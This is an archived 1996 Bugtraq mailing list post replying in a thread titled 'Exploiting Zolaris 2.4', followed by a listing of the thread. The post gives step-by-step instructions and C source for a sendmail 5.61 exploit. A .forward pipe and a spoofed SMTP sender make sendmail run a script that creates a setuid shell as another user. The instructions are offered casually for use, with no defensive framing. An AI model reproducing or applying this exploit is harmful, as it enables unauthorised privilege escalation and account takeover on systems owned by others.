Bugtraq mailing list archives
Re: Exploiting Zolaris 2.4 ?? :)
From: fletch () MODEX COM (Fletch)
Date: Sun, 4 Aug 1996 18:23:20 -0400
has anyone had any luck with this proggie?? Fuckin sendmail 5.61 - #define MYUID to be your uid at the top of the program. make a file /tmp/x, which is a script to make a suid shell compile the prog, call it say /tmp/yo put in your .forward file: "|/tmp/yo"F now connect 2 the smtp port, and send urself mail FROM whomever you want the shell as (anyone except root). Wait a bit (maybe up 2 an hour - depends how often the sendmail runs un the queue). Type mailq every so often (or /usr/lib/sendmail -bq). You will see your entry in the queue, before its flushed. It usually works, but sometimes it doesn't - you just gotta keep your fingers crossed! #define MYUID 123 /* change this!! */ #include <sys/param.h> #include <sys/types.h> #include <stdio.h> #include <sysexits.h> #include <pwd.h> #include <grp.h> #define OURFILE "/tmp/x" main() int myuid, rval; if ((myuid = getuid()) == MYUID) rval = EX_TEMPFAIL; else { rval = EX_OK; system(OURFILE); } exit(rval); } Peace out. +-------------+ "Fletch" | ||||| | <Fletch () modex com> | (x x) | Http://www.modex.com/~fletch --+oOOO-(_)-OOOo+-------------------------------
Current thread:
- Re: Exploiting Zolaris 2.4 ?? :) Leif Hedstrom (Aug 04)
- <Possible follow-ups>
- Re: Exploiting Zolaris 2.4 ?? :) Fletch (Aug 04)
- Re: your mail Greg Woods (Aug 05)
- Re: your mail neill (Aug 05)
- PAM login programs? Josh Wilmes (Aug 05)
- procmail DANIEL .D .EZEKIEL (Aug 05)
- (Fwd) CERT Advisory CA-96.17 - Vulnerability in Solaris vold Hubert Feyrer (Aug 06)
- Re: procmail Adam Shostack (Aug 06)
- Re: procmail Jon Lewis (Aug 06)
- Re: procmail Neil Soveran-Charley (Aug 06)
- Re: procmail James Wang (Aug 06)
- Re: procmail Kari E. Hurtta (Aug 06)
- Re: your mail Greg Woods (Aug 05)